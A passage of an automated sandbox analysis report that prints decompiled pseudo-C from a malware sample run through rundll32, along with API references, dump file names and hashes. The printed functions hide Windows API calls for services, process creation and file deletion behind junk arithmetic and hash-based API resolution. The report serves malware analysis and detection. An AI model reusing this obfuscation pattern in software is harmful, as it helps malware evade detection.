				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E002207A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}

0x00215fb5
0x00215fb6
0x00215fb7
0x00215fbb
0x00215fbc
0x00215fc1
0x00215fcb
0x00215fd7
0x00215fde
0x00215fe5
0x00215ffc
0x00215fff
0x00216006
0x0021600d
0x0021601a
0x00216025
0x0021602a

APIs

CloseServiceHandle.ADVAPI32(39CCF342), ref: 00216025

Memory Dump Source

Source File: 0000000D.00000002.2113814198.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 0000000D.00000002.2113790787.0000000000210000.00000004.00000001.sdmp Download File
Associated: 0000000D.00000002.2114728968.000000000022C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_210000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction ID: 5d995ea7630725837acdc99d8627ad3ff9cdb75dcbb2e3a096d8fe34c137cd10
Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction Fuzzy Hash: C9F04FB0C11208FFDB08DFA0E94689EBFB8EB40300F20819CE409A7260E7715F559F54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2804 Parent PID: 2472 rundll32.exeCOMMON

Executed Functions

Function 006F2959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 62%

			E006F2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E006F602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E007007A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

0x006f295f
0x006f2964
0x006f2967
0x006f296a
0x006f296d
0x006f296e
0x006f296f
0x006f2977
0x006f2985
0x006f298a
0x006f2992
0x006f299a
0x006f29a2
0x006f29a9
0x006f29b0
0x006f29b7
0x006f29bb
0x006f29cf
0x006f29dc
0x006f29e2

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 006F29DC

Strings

<^, xrefs: 006F2977

Memory Dump Source

Source File: 0000000E.00000002.2115505168.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true

Associated: 0000000E.00000002.2115499812.00000000006F0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2115530162.000000000070C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6f0000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction ID: ca49cc186a24874a8e9dd37eb638a22a582d058c2f3682b599a27c4a55f591cd
Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction Fuzzy Hash: 8D018072A00108BFEB14DF95DC0A8DFBFB6EF45310F108088F508A6250D7B65F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 006FC6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E006FC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E006F602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E007007A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x006fc6e1
0x006fc6e6
0x006fc6f0
0x006fc6fc
0x006fc703
0x006fc706
0x006fc70d
0x006fc711
0x006fc715
0x006fc71c
0x006fc723
0x006fc72a
0x006fc731
0x006fc738
0x006fc751
0x006fc762
0x006fc768

APIs

SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 006FC762

Strings

/O, xrefs: 006FC6E6

Memory Dump Source

Source File: 0000000E.00000002.2115505168.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true

Associated: 0000000E.00000002.2115499812.00000000006F0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2115530162.000000000070C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6f0000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction ID: dd0eea230056572eb473f0df6e18c6c0daa3df0761a2dde7f723cd6a2fbc1d49
Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction Fuzzy Hash: BF1122B290122DBBCB259F94DD498EFBEB9EF05714F108188B90962210D7714A659BE0

Uniqueness

Uniqueness Score: -1.00%

Function 006F1000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E006F1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E006F602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E007007A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

0x006f1006
0x006f1009
0x006f100c
0x006f1011
0x006f1016
0x006f101d
0x006f1026
0x006f102d
0x006f1034
0x006f103b
0x006f1047
0x006f104f
0x006f1057
0x006f105e
0x006f1065
0x006f106c
0x006f1073
0x006f1077
0x006f108b
0x006f1096
0x006f109b

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 006F1096

Strings

[, xrefs: 006F103B

Memory Dump Source

Source File: 0000000E.00000002.2115505168.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true

Associated: 0000000E.00000002.2115499812.00000000006F0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2115530162.000000000070C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6f0000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: [
API String ID: 1029625771-3431493590
Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction ID: 587de7aef1136b13a0e4d14e584ee3088e41f238e0c91bac3239a2f418fbb1e6
Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
Instruction Fuzzy Hash: F5016DB6D0130CFBDF04DF94C94A6DEBBB1EF54318F108188F51466291D7B19B649B91

Uniqueness

Uniqueness Score: -1.00%

Function 006F4859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E006F4859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E007007A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}

0x006f485e
0x006f487a
0x006f487d
0x006f4884
0x006f488b
0x006f4892
0x006f489d
0x006f48a0
0x006f48ad
0x006f48b7

APIs

ExitProcess.KERNELBASE(00000000), ref: 006F48B7

Strings

[, xrefs: 006F488B

Memory Dump Source

Source File: 0000000E.00000002.2115505168.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true

Associated: 0000000E.00000002.2115499812.00000000006F0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2115530162.000000000070C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6f0000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: [
API String ID: 621844428-1822564810
Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction ID: cd6404dc752d1c8971cb57802cd65efb7c98ef117e6a2ef10ab3ddb4716106c6
Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction Fuzzy Hash: F0F017B0A05209FBDB04CFE8CA56A9EBFF9EB40301F20818CE444B7290E3B55F509B50

Uniqueness

Uniqueness Score: -1.00%

Function 00704F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E00704F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E006F602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E007007A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x00704f80
0x00704f81
0x00704f82
0x00704f86
0x00704f87
0x00704f8c
0x00704fa5
0x00704fa8
0x00704faf
0x00704fb6
0x00704fc7
0x00704fca
0x00704fd7
0x00704fe2
0x00704fe7

APIs

CloseHandle.KERNELBASE(003E66D8), ref: 00704FE2

Strings

{#lm, xrefs: 00704FC2

Memory Dump Source

Source File: 0000000E.00000002.2115505168.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true

Associated: 0000000E.00000002.2115499812.00000000006F0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2115530162.000000000070C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6f0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction ID: 8aae62e17bd9586afd767884eb545bb771224710aee2626a314b92568e48ad66
Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction Fuzzy Hash: 94F037B081120CFFDF04DFA4DA4689EBFBAEB41310F208299E804AB250D3715B509B54

Uniqueness

Uniqueness Score: -1.00%

Function 0070976F, Relevance: 1.6, APIs: 1, Instructions: 63
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 21%

			E0070976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006F602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E007007A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}

0x00709772
0x00709773
0x00709778
0x0070977a
0x0070977b
0x0070977e
0x0070977f
0x00709782
0x00709785
0x00709788
0x00709789
0x0070978c
0x0070978f
0x00709790
0x00709791
0x00709794
0x00709797
0x0070979a
0x0070979d
0x007097a0
0x007097a3
0x007097a6
0x007097a7
0x007097a8
0x007097ad
0x007097b7
0x007097c3
0x007097ca
0x007097d1
0x007097d8
0x007097df
0x007097e3
0x007097fc
0x00709816
0x0070981d

APIs

CreateProcessW.KERNEL32(006F591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,006F591A), ref: 00709816

Memory Dump Source

Source File: 0000000E.00000002.2115505168.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true

Associated: 0000000E.00000002.2115499812.00000000006F0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2115530162.000000000070C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6f0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction ID: 2960f99c87d690888f322fff86b6f3f9fd8c3413a5f876eed1397a7144664708
Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction Fuzzy Hash: 2411D372800148FBDF199F92DC0ACDF7F7AEF89750F104148FA1452120D2768A60EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 006FB566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E006FB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E006F602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E007007A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

0x006fb569
0x006fb56a
0x006fb56d
0x006fb572
0x006fb574
0x006fb577
0x006fb57a
0x006fb57d
0x006fb580
0x006fb583
0x006fb586
0x006fb587
0x006fb58a
0x006fb58d
0x006fb590
0x006fb593
0x006fb594
0x006fb595
0x006fb59a
0x006fb5a4
0x006fb5b8
0x006fb5c0
0x006fb5c4
0x006fb5cb
0x006fb5d2
0x006fb5d9
0x006fb5e6
0x006fb5fd
0x006fb604

APIs

CreateFileW.KERNELBASE(00700668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00700668,?,?,?,?), ref: 006FB5FD

Memory Dump Source

Source File: 0000000E.00000002.2115505168.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true

Associated: 0000000E.00000002.2115499812.00000000006F0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2115530162.000000000070C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6f0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction ID: 45cee30b9e7ae41b342cf837d0c8a9aa609397758199f8df1757f54c9cee0e0d
Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction Fuzzy Hash: 2F11B272801248FBDF56DF95DD06CEE7FBAEF89314F148198FA1862160D3769A20EB50

Uniqueness

Uniqueness Score: -1.00%

Function 0070981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0070981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006F602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E007007A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

0x00709821
0x00709822
0x00709825
0x00709828
0x0070982a
0x0070982c
0x0070982f
0x00709832
0x00709835
0x00709836
0x00709837
0x0070983c
0x00709855
0x00709858
0x0070985f
0x00709866
0x0070986d
0x00709874
0x0070987b
0x0070988e
0x0070989b
0x007098a2

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,006F87F2,0000CAAE,0000510C,AD82F196), ref: 0070989B

Memory Dump Source

Source File: 0000000E.00000002.2115505168.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true

Associated: 0000000E.00000002.2115499812.00000000006F0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2115530162.000000000070C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6f0000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction ID: 9c8c09317b007f7bd86bad20a98775aa15cd9fb6c1f63d776a9811ab922738d1
Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction Fuzzy Hash: 05018872801208FBDB04EF95D8468DFBFB9EF85310F108188F908A6220E6715A219BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00707BF4, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00707BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E006F602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E007007A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}

0x00707bf7
0x00707bf8
0x00707bfa
0x00707bfd
0x00707bff
0x00707c02
0x00707c06
0x00707c07
0x00707c0f
0x00707c1d
0x00707c25
0x00707c2d
0x00707c31
0x00707c38
0x00707c3f
0x00707c46
0x00707c4a
0x00707c5e
0x00707c67
0x00707c6d

APIs

SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00707C67

Memory Dump Source

Source File: 0000000E.00000002.2115505168.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true

Associated: 0000000E.00000002.2115499812.00000000006F0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2115530162.000000000070C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6f0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction ID: 0674e02bded5bd20644b8e080a16c77705a7e059a75d180ff8dd3858932a7396
Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction Fuzzy Hash: 0A014FB190120CFFEB09DF94C94A9DE7BB5EF45314F208198F50567240EAB15F509B91

Uniqueness

Uniqueness Score: -1.00%

Function 006FF65F, Relevance: 1.5, APIs: 1, Instructions: 40
serviceCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E006FF65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E006F602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E007007A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}

0x006ff662
0x006ff663
0x006ff665
0x006ff668
0x006ff66a
0x006ff66d
0x006ff670
0x006ff673
0x006ff677
0x006ff678
0x006ff67d
0x006ff687
0x006ff693
0x006ff69a
0x006ff6a1
0x006ff6a5
0x006ff6a9
0x006ff6b0
0x006ff6c9
0x006ff6d8
0x006ff6de

APIs

OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 006FF6D8

Memory Dump Source

Source File: 0000000E.00000002.2115505168.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true

Associated: 0000000E.00000002.2115499812.00000000006F0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2115530162.000000000070C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6f0000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction ID: b0b7d180a576a73d36972083d8915f41c80b725a8390c6f41c394fff7b1e1b1d
Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction Fuzzy Hash: 6B01E5B690120CBBEF059F94DD0A8DF7F75EB05324F148188F90462250D6B65E21DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 006FB6DD, Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E006FB6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E006F602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E007007A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}

0x006fb6f3
0x006fb6f8
0x006fb702
0x006fb70b
0x006fb712
0x006fb719
0x006fb720
0x006fb727
0x006fb72e
0x006fb747
0x006fb759
0x006fb75e

APIs

SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 006FB759

Memory Dump Source

Source File: 0000000E.00000002.2115505168.00000000006F1000.00000020.00000001.sdmp, Offset: 006F0000, based on PE: true

Associated: 0000000E.00000002.2115499812.00000000006F0000.00000004.00000001.sdmp Download File
Associated: 0000000E.00000002.2115530162.000000000070C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6f0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction ID: 98a006c25d1a5b752be8c98995bd2f80259f6a2f32882c83e33515e941ae84ce
Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction Fuzzy Hash: 9D018FB194030CFBEF45DF90DD06E9E7BB5EF04704F108188FA0526190D3B15E209B51

Uniqueness

Uniqueness Score: -1.00%

Function 0070AA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0070AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E006F602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E007007A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x0070aa3f
0x0070aa40
0x0070aa41
0x0070aa44
0x0070aa47
0x0070aa4b
0x0070aa4c
0x0070aa51
0x0070aa5b
0x0070aa64
0x0070aa68
0x0070aa6f
0x0070aa76
0x0070aa8d
0x0070aa90
0x0070aa9d
0x0070aaa8
0x0070aaad

APIs

DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0070AAA8

